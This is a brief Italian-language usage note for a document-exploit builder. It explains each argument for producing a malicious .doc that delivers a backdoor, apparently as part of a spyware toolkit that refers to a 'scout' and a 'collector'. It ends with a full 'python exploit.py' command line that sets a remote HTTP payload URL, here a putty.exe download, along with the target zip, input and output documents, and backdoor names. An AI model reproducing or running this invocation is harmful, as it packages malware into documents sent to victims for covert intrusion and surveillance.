sendtotarget.zip -> contiene il .doc con l'exploit originale.doc -> .doc in input ior.doc -> nome documento in output putty.exe -> path della backdoor server.zip -> contenuto che va sul collector backoffice.exe -> nome dello scout python exploit.py payload:http http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe sendtotarget.zip originale.doc ior.doc putty.exe server.zip backoffice.exe